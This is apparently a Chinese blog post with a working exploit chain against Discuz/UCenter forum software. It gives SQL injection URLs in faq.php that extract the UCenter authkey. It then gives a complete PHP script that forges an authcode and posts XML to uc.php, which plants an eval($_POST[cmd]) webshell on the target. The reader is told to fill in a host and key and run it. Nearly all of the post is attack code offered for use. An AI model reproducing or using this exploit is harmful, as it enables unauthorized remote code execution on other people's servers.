这篇文章上次修改于 1756 天前,可能其部分内容已经发生变化,如有疑问可询问作者。
第一步
首先获取获取uc key,exp:
faq.php?action=grouppermission&gids[99]=’&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,62) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23
如下图:
没完整取值只取了62位。我们再取一次
Exp:
faq.php?action=grouppermission&gids[99]=’&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,63,60) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23
那么获取到的uc key就是d77978Sbq4b39bVccfK0J9B0K3x792ieH39dNbY8s8l79dB3z63fp2t563rdm6P4
和shell里的对比下:
下面利用uc key getshell,EXP:
<?php
$timestamp = time()+10*3600;
$host="bbs.xxxxxx.com";
$uc_key="A1v8Z5Z7feZdmfcd72J5C5V8hc8dM4F6V2g0h5ofXdS6jcm1C78bZede39z51610";
$code=urlencode(_authcode("time=$timestamp&action=updateapps", ’ENCODE’, $uc_key));
$cmd1=’<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">xxx’);eval($_POST[cmd]);//</item>
</root>’;
$cmd2=’<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">aaa</item>
</root>’;
$html1 = send($cmd1);
echo $html1;
$html2 = send($cmd2);
echo $html2;
function send($cmd){
global $host,$code;
$message = "POST /api/uc.php?code=".$code." HTTP/1.1
";
$message .= "Accept: */*
";
$message .= "Referer: ".$host."
";
$message .= "Accept-Language: zh-cn
";
$message .= "Content-Type: application/x-www-form-urlencoded
";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)
";
$message .= "Host: ".$host."
";
$message .= "Content-Length: ".strlen($cmd)."
";
$message .= "Connection: Close
";
$message .= $cmd;
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = ’’;
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
function _authcode($string, $operation = ’DECODE’, $key = ’’, $expiry = 0) {
$ckey_length = 4;
$key = md5($key ? $key : UC_KEY);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == ’DECODE’ ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ’’;
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
$string = $operation == ’DECODE’ ? base64_decode(substr($string, $ckey_length)) : sprintf(’%010d’, $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = ’’;
$box = range(0, 255);
$rndkey = array();
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if($operation == ’DECODE’) {
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return ’’;
}
} else {
return $keyc.str_replace(’=’, ’’, base64_encode($result));
}
}
?>
修改以下内容:
$host="bbs.xxxxxx.com";
$uc_key="xxx"
放在php.exe的环境里直接 getshell,成功会显示:
1
1
0
一句话地址,以下是代码分析:
第一处是host,第二处是目录:
没有评论